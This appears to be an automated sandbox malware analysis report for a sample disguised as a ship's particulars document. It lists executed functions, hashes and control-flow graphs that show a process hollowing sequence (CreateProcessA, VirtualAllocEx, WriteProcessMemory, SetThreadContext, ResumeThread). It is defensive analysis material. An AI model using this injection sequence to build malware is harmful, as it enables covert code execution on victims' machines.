6c97ac9 CreateProcessA 22178->22179 22181 6c97c8b 22179->22181 22183 6c99e70 22182->22183 22192 6c976f8 22183->22192 22196 6c976f2 22183->22196 22184 6c99ea4 22184->22136 22188 6c99e85 22187->22188 22190 6c976f8 VirtualAllocEx 22188->22190 22191 6c976f2 VirtualAllocEx 22188->22191 22189 6c99ea4 22189->22136 22190->22189 22191->22189 22193 6c97738 VirtualAllocEx 22192->22193 22195 6c97775 22193->22195 22195->22184 22197 6c976f8 VirtualAllocEx 22196->22197 22199 6c97775 22197->22199 22199->22184 22201 6c9761d Wow64SetThreadContext 22200->22201 22203 6c976ad 22201->22203 22203->22140 22205 6c97665 Wow64SetThreadContext 22204->22205 22207 6c976ad 22205->22207 22207->22140 22209 6c978f3 ReadProcessMemory 22208->22209 22211 6c97937 22209->22211 22211->22148 22213 6c978a8 ReadProcessMemory 22212->22213 22215 6c97937 22213->22215 22215->22148 22217 6c97178 ResumeThread 22216->22217 22219 6c971a9 22217->22219 22219->22152 22221 6c97138 ResumeThread 22220->22221 22223 6c971a9 22221->22223 22223->22152 22234 b54668 22235 b54672 22234->22235 22237 b54758 22234->22237 22238 b5477d 22237->22238 22242 b54868 22238->22242 22246 b54858 22238->22246 22244 b5488f 22242->22244 22243 b5496c 22243->22243 22244->22243 22250 b544b4 22244->22250 22247 b5488f 22246->22247 22248 b5496c 22247->22248 22249 b544b4 CreateActCtxA 22247->22249 22249->22248 22251 b558f8 CreateActCtxA 22250->22251 22253 b559bb 22251->22253 22253->22253

                                                                                                                  Executed Functions

                                                                                                                  Function 06C9AF01 Relevance: .4, Instructions: 397COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dbefa349140b259a8df58d69f4570726d75490180ac9270ad1b923397441fcbe
                                                                                                                  • Instruction ID: f8f030ec36b35ea3bcbde48e59971dffc06026c6f17eab32cf2e54501d0fabac
                                                                                                                  • Opcode Fuzzy Hash: dbefa349140b259a8df58d69f4570726d75490180ac9270ad1b923397441fcbe
                                                                                                                  • Instruction Fuzzy Hash: 19E1CC70B006049FDB69DBB5C558BAFBBF6AF89700F1444ADE106AB290CB35ED05CB61
                                                                                                                  Function 06C991BC Relevance: .1, Instructions: 116COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e57c8a021b669e29d11636925a5b9498e115ae7f5b24687174022745e2cbc484
                                                                                                                  • Instruction ID: 4ffb249f9cce37f623c440b96018a2cb94e07172f6022e60a31c0d135acd43c6
                                                                                                                  • Opcode Fuzzy Hash: e57c8a021b669e29d11636925a5b9498e115ae7f5b24687174022745e2cbc484
                                                                                                                  • Instruction Fuzzy Hash: 08414A71D44619CFEB64CF55C848BE9BBB9BF4A300F1495AAD519A2240EB709AC1CF90
                                                                                                                  Function 06C91E70 Relevance: .1, Instructions: 61COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 04534e5107c7355dda962c728b31a530e658fe08fe3bbd2eacde53aa1c83fd88
                                                                                                                  • Instruction ID: 622093a47f015915e61cf6bdb3765299dda70c4efcc963cc1a8725aac206496b
                                                                                                                  • Opcode Fuzzy Hash: 04534e5107c7355dda962c728b31a530e658fe08fe3bbd2eacde53aa1c83fd88
                                                                                                                  • Instruction Fuzzy Hash: 2C21F4B0D056189BEB18CFA7C9597DEBEF6AF89304F04C06AD409B6264DB7409468BA0
                                                                                                                  Function 00B5CF90 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 294 b5cf90-b5d02f GetCurrentProcess 298 b5d031-b5d037 294->298 299 b5d038-b5d06c GetCurrentThread 294->299 298->299 300 b5d075-b5d0a9 GetCurrentProcess 299->300 301 b5d06e-b5d074 299->301 302 b5d0b2-b5d0cd call b5d578 300->302 303 b5d0ab-b5d0b1 300->303 301->300 307 b5d0d3-b5d102 GetCurrentThreadId 302->307 303->302 308 b5d104-b5d10a 307->308 309 b5d10b-b5d16d 307->309 308->309
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B5D01E
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00B5D05B
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B5D098
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B5D0F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: a496005354fca0062d7a09e2a32957444c0dd64dd5bb8e518d6929274f728566
                                                                                                                  • Instruction ID: 2d9e444120fb551702d573406f1669b4042d020d21328df1353e0a30636fdc73
                                                                                                                  • Opcode Fuzzy Hash: a496005354fca0062d7a09e2a32957444c0dd64dd5bb8e518d6929274f728566
                                                                                                                  • Instruction Fuzzy Hash: A95187B09003498FDB64CFA9D948BDEBFF1EF88314F24849AE408A73A0D7745884CB65
                                                                                                                  Function 00B5CFA0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 316 b5cfa0-b5d02f GetCurrentProcess 320 b5d031-b5d037 316->320 321 b5d038-b5d06c GetCurrentThread 316->321 320->321 322 b5d075-b5d0a9 GetCurrentProcess 321->322 323 b5d06e-b5d074 321->323 324 b5d0b2-b5d0cd call b5d578 322->324 325 b5d0ab-b5d0b1 322->325 323->322 329 b5d0d3-b5d102 GetCurrentThreadId 324->329 325->324 330 b5d104-b5d10a 329->330 331 b5d10b-b5d16d 329->331 330->331
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B5D01E
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00B5D05B
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B5D098
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B5D0F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: a390e5cb71f759d90ea319c9472848568b39223d1d9a919808d191c37cee4169
                                                                                                                  • Instruction ID: 1ad5173fbca16f274ba78fb48ab142ed3e9c7ee1dfa489bb3574e0aee5e1e1e3
                                                                                                                  • Opcode Fuzzy Hash: a390e5cb71f759d90ea319c9472848568b39223d1d9a919808d191c37cee4169
                                                                                                                  • Instruction Fuzzy Hash: E65178B0900349CFDB64CFA9D948B9EBBF1EF88314F24849AE508A7390D7745984CF65
                                                                                                                  Function 00B5AD08 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 338 b5ad08-b5ad17 339 b5ad43-b5ad47 338->339 340 b5ad19-b5ad26 call b5a02c 338->340 341 b5ad49-b5ad53 339->341 342 b5ad5b-b5ad9c 339->342 347 b5ad3c 340->347 348 b5ad28 340->348 341->342 349 b5ad9e-b5ada6 342->349 350 b5ada9-b5adb7 342->350 347->339 393 b5ad2e call b5afa0 348->393 394 b5ad2e call b5af90 348->394 349->350 351 b5adb9-b5adbe 350->351 352 b5addb-b5addd 350->352 356 b5adc0-b5adc7 call b5a038 351->356 357 b5adc9 351->357 355 b5ade0-b5ade7 352->355 353 b5ad34-b5ad36 353->347 354 b5ae78-b5af38 353->354 388 b5af40-b5af6b GetModuleHandleW 354->388 389 b5af3a-b5af3d 354->389 358 b5adf4-b5adfb 355->358 359 b5ade9-b5adf1 355->359 360 b5adcb-b5add9 356->360 357->360 362 b5adfd-b5ae05 358->362 363 b5ae08-b5ae11 call b5a048 358->363 359->358 360->355 362->363 369 b5ae13-b5ae1b 363->369 370 b5ae1e-b5ae23 363->370 369->370 372 b5ae25-b5ae2c 370->372 373 b5ae41-b5ae45 370->373 372->373 374 b5ae2e-b5ae3e call b5a058 call b5a068 372->374 395 b5ae48 call b5b2a0 373->395 396 b5ae48 call b5b290 373->396 374->373 375 b5ae4b-b5ae4e 378 b5ae71-b5ae77 375->378 379 b5ae50-b5ae6e 375->379 379->378 390 b5af74-b5af88 388->390 391 b5af6d-b5af73 388->391 389->388 391->390 393->353 394->353 395->375 396->375
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B5AF5E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID: dRp$dRp
                                                                                                                  • API String ID: 4139908857-3792169924
                                                                                                                  • Opcode ID: 8f532de9572f622d00ba7231e44ddc7c430f13df4735398eb43cff8f33fa025a
                                                                                                                  • Instruction ID: 1c7fb993a71b159bb0f6a7cf59cb8667eb870fedd26e781365d0469429d2a8a0
                                                                                                                  • Opcode Fuzzy Hash: 8f532de9572f622d00ba7231e44ddc7c430f13df4735398eb43cff8f33fa025a
                                                                                                                  • Instruction Fuzzy Hash: EF816870A00B058FDB64DF29D44175ABBF1FF88305F108AADD886E7A90DB74E849CB91
                                                                                                                  Function 06C97A34 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 546 6c97a34-6c97ad5 548 6c97b0e-6c97b2e 546->548 549 6c97ad7-6c97ae1 546->549 556 6c97b30-6c97b3a 548->556 557 6c97b67-6c97b96 548->557 549->548 550 6c97ae3-6c97ae5 549->550 551 6c97b08-6c97b0b 550->551 552 6c97ae7-6c97af1 550->552 551->548 554 6c97af3 552->554 555 6c97af5-6c97b04 552->555 554->555 555->555 559 6c97b06 555->559 556->557 558 6c97b3c-6c97b3e 556->558 565 6c97b98-6c97ba2 557->565 566 6c97bcf-6c97c89 CreateProcessA 557->566 560 6c97b61-6c97b64 558->560 561 6c97b40-6c97b4a 558->561 559->551 560->557 563 6c97b4c 561->563 564 6c97b4e-6c97b5d 561->564 563->564 564->564 567 6c97b5f 564->567 565->566 568 6c97ba4-6c97ba6 565->568 577 6c97c8b-6c97c91 566->577 578 6c97c92-6c97d18 566->578 567->560 570 6c97bc9-6c97bcc 568->570 571 6c97ba8-6c97bb2 568->571 570->566 572 6c97bb4 571->572 573 6c97bb6-6c97bc5 571->573 572->573 573->573 575 6c97bc7 573->575 575->570 577->578 588 6c97d28-6c97d2c 578->588 589 6c97d1a-6c97d1e 578->589 591 6c97d3c-6c97d40 588->591 592 6c97d2e-6c97d32 588->592 589->588 590 6c97d20 589->590 590->588 594 6c97d50-6c97d54 591->594 595 6c97d42-6c97d46 591->595 592->591 593 6c97d34 592->593 593->591 596 6c97d66-6c97d6d 594->596 597 6c97d56-6c97d5c 594->597 595->594 598 6c97d48 595->598 599 6c97d6f-6c97d7e 596->599 600 6c97d84 596->600 597->596 598->594 599->600 602 6c97d85 600->602 602->602
                                                                                                                  APIs
                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C97C76
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 963392458-0
                                                                                                                  • Opcode ID: d67d28bda6334e750d75f1e6b842edbee4ba458d32d29495cbd952f13cb384f4
                                                                                                                  • Instruction ID: 26285eecc04bdfe083b0461580873822160d6951cd36815a0a1bacde0d6029f8
                                                                                                                  • Opcode Fuzzy Hash: d67d28bda6334e750d75f1e6b842edbee4ba458d32d29495cbd952f13cb384f4
                                                                                                                  • Instruction Fuzzy Hash: BA915971D11219DFDF64CF68CC45BAEBBB2BF48310F1485A9E808A7240DB749A85CFA1
                                                                                                                  Function 06C97A40 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 603 6c97a40-6c97ad5 605 6c97b0e-6c97b2e 603->605 606 6c97ad7-6c97ae1 603->606 613 6c97b30-6c97b3a 605->613 614 6c97b67-6c97b96 605->614 606->605 607 6c97ae3-6c97ae5 606->607 608 6c97b08-6c97b0b 607->608 609 6c97ae7-6c97af1 607->609 608->605 611 6c97af3 609->611 612 6c97af5-6c97b04 609->612 611->612 612->612 616 6c97b06 612->616 613->614 615 6c97b3c-6c97b3e 613->615 622 6c97b98-6c97ba2 614->622 623 6c97bcf-6c97c89 CreateProcessA 614->623 617 6c97b61-6c97b64 615->617 618 6c97b40-6c97b4a 615->618 616->608 617->614 620 6c97b4c 618->620 621 6c97b4e-6c97b5d 618->621 620->621 621->621 624 6c97b5f 621->624 622->623 625 6c97ba4-6c97ba6 622->625 634 6c97c8b-6c97c91 623->634 635 6c97c92-6c97d18 623->635 624->617 627 6c97bc9-6c97bcc 625->627 628 6c97ba8-6c97bb2 625->628 627->623 629 6c97bb4 628->629 630 6c97bb6-6c97bc5 628->630 629->630 630->630 632 6c97bc7 630->632 632->627 634->635 645 6c97d28-6c97d2c 635->645 646 6c97d1a-6c97d1e 635->646 648 6c97d3c-6c97d40 645->648 649 6c97d2e-6c97d32 645->649 646->645 647 6c97d20 646->647 647->645 651 6c97d50-6c97d54 648->651 652 6c97d42-6c97d46 648->652 649->648 650 6c97d34 649->650 650->648 653 6c97d66-6c97d6d 651->653 654 6c97d56-6c97d5c 651->654 652->651 655 6c97d48 652->655 656 6c97d6f-6c97d7e 653->656 657 6c97d84 653->657 654->653 655->651 656->657 659 6c97d85 657->659 659->659
                                                                                                                  APIs
                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C97C76
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 963392458-0
                                                                                                                  • Opcode ID: 6df8ad4378240b7f30fd8c8d4efd55fa9cb0f0f20bb82a6b48ebbde69be8b893
                                                                                                                  • Instruction ID: e5829cd79bfb0d5860020b19437df647d02d6a64c65fa24e3939a164442652c6
                                                                                                                  • Opcode Fuzzy Hash: 6df8ad4378240b7f30fd8c8d4efd55fa9cb0f0f20bb82a6b48ebbde69be8b893
                                                                                                                  • Instruction Fuzzy Hash: 8F915871D11219DFDF64CF68C845BAEBBB2BF48314F1485A9E808A7240DB749A85CFA1
                                                                                                                  Function 00B558EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 768 b558ec-b559b9 CreateActCtxA 770 b559c2-b55a1c 768->770 771 b559bb-b559c1 768->771 778 b55a1e-b55a21 770->778 779 b55a2b-b55a2f 770->779 771->770 778->779 780 b55a31-b55a3d 779->780 781 b55a40 779->781 780->781 782 b55a41 781->782 782->782
                                                                                                                  APIs
                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00B559A9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Create
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2289755597-0
                                                                                                                  • Opcode ID: 3bf08fa6a2b6c09582e9c583f97b55b0dba9848206a503dcf1eb4d9045590587
                                                                                                                  • Instruction ID: 32099ae47d3c576d410e397eaa8dd7c8b000433c1df5a49ff7eecea7478407c6
                                                                                                                  • Opcode Fuzzy Hash: 3bf08fa6a2b6c09582e9c583f97b55b0dba9848206a503dcf1eb4d9045590587
                                                                                                                  • Instruction Fuzzy Hash: B641E2B0C00619CFDB24CFA9C984BDEBBB5FF88305F20819AD458AB251DB756949CF50
                                                                                                                  Function 00B544B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 784 b544b4-b559b9 CreateActCtxA 787 b559c2-b55a1c 784->787 788 b559bb-b559c1 784->788 795 b55a1e-b55a21 787->795 796 b55a2b-b55a2f 787->796 788->787 795->796 797 b55a31-b55a3d 796->797 798 b55a40 796->798 797->798 799 b55a41 798->799 799->799
                                                                                                                  APIs
                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00B559A9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Create
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2289755597-0
                                                                                                                  • Opcode ID: ab85a0787d4ae8c2869f4ecb3bdb1a9508eec7640cabefca85714421d6fcf6e8
                                                                                                                  • Instruction ID: fc48009518c8608f86dfd1bb39da7b4d9935357563e40f6ea8dbafc57d68c32a
                                                                                                                  • Opcode Fuzzy Hash: ab85a0787d4ae8c2869f4ecb3bdb1a9508eec7640cabefca85714421d6fcf6e8
                                                                                                                  • Instruction Fuzzy Hash: 6141D3B0C00719CBDB24DFA9C984B8EBBF5FF48305F20819AD418AB251DB756949CF90
                                                                                                                  Function 06C977B0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 801 6c977b0-6c97806 804 6c97808-6c97814 801->804 805 6c97816-6c97855 WriteProcessMemory 801->805 804->805 807 6c9785e-6c9788e 805->807 808 6c97857-6c9785d 805->808 808->807
                                                                                                                  APIs
                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C97848
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3559483778-0
                                                                                                                  • Opcode ID: 87d9eb4f36c97c1630e383054a9ed45e38d4c963011da4167d1618be640bd0d6
                                                                                                                  • Instruction ID: f85ee72452751640597cc27c8a9589be08cb3dac857e2e3910bba376ae615067
                                                                                                                  • Opcode Fuzzy Hash: 87d9eb4f36c97c1630e383054a9ed45e38d4c963011da4167d1618be640bd0d6
                                                                                                                  • Instruction Fuzzy Hash: D02124B19003499FDB10CFAAC885BDEBBF5FB48320F10842AE958A7240D7789940DBA4
                                                                                                                  Function 06C977B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 812 6c977b8-6c97806 814 6c97808-6c97814 812->814 815 6c97816-6c97855 WriteProcessMemory 812->815 814->815 817 6c9785e-6c9788e 815->817 818 6c97857-6c9785d 815->818 818->817
                                                                                                                  APIs
                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C97848
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3559483778-0
                                                                                                                  • Opcode ID: fa1657b9bb28a21178f9805a4489dde0df1f1fa2eafcc77203313aadb4b6d55c
                                                                                                                  • Instruction ID: 937143043d83e8fa287fbf8541657ed8b8eb9cbcc0b5602c1399e8ce222baa6e
                                                                                                                  • Opcode Fuzzy Hash: fa1657b9bb28a21178f9805a4489dde0df1f1fa2eafcc77203313aadb4b6d55c
                                                                                                                  • Instruction Fuzzy Hash: DD2113B19003499FCB14CFAAC985BDEBBF5FF48320F10842AE958A7240D7789940DBA5
                                                                                                                  Function 00B5D5E8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 822 b5d5e8-b5d684 DuplicateHandle 823 b5d686-b5d68c 822->823 824 b5d68d-b5d6aa 822->824 823->824
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5D677
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: 1b07fdd75a58e5dcb895058f61e66cd19046a0be520d1e01e452a664dbfd76a3
                                                                                                                  • Instruction ID: c63fd10140d4d1cf4cec8ec48badb327bb7e24fe8117e3d0d12ed633a0c5e403
                                                                                                                  • Opcode Fuzzy Hash: 1b07fdd75a58e5dcb895058f61e66cd19046a0be520d1e01e452a664dbfd76a3
                                                                                                                  • Instruction Fuzzy Hash: A521D6B59002489FDB10CFAAD985ADEBFF5FB48320F14815AE958A3310C3799945CF60
                                                                                                                  Function 06C97618 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C9769E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: 0bdfdf7cee774334a3dc046cf343b52323eb9afac5b910e805781bbef4507993
                                                                                                                  • Instruction ID: c5ecf4c99f885fcc812b61f7781d1c5cd6e72508097d35c88ca4d0dd1d87caf2
                                                                                                                  • Opcode Fuzzy Hash: 0bdfdf7cee774334a3dc046cf343b52323eb9afac5b910e805781bbef4507993
                                                                                                                  • Instruction Fuzzy Hash: 7B2139B1D103098FDB10CFAAC8857AEBBF5EF88324F14842AD559A7280D7789945CBA1
                                                                                                                  Function 06C978A0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C97928
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1726664587-0
                                                                                                                  • Opcode ID: 69ec8e886b4f9aa21f70400b54fcd785ccd323fcdcd9dc09b58ba6e474586a13
                                                                                                                  • Instruction ID: cd231f8db9a7245a73cf1e06cb14cc6814f1a9fcb768287ec4443ef8ecb30b5d
                                                                                                                  • Opcode Fuzzy Hash: 69ec8e886b4f9aa21f70400b54fcd785ccd323fcdcd9dc09b58ba6e474586a13
                                                                                                                  • Instruction Fuzzy Hash: DB2148B1D003499FDF10CFAAC885ADEBBF5FF48320F14842AE559A7250D7789940DBA0
                                                                                                                  Function 06C97620 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C9769E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: 8de09e3df252a3438bb66dbfd5952e6187b6e1e2da117cf140f53267b4021c22
                                                                                                                  • Instruction ID: 79d49fee2c390f78fb3706fa20cd86d87479eaa0c1883ba560c247ed0ede882b
                                                                                                                  • Opcode Fuzzy Hash: 8de09e3df252a3438bb66dbfd5952e6187b6e1e2da117cf140f53267b4021c22
                                                                                                                  • Instruction Fuzzy Hash: FB2138B1D103098FDB10CFAAC8857AEBBF4EF88324F14842AD459A7240D7789944CFA1
                                                                                                                  Function 06C978A8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C97928
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                  • String ID:
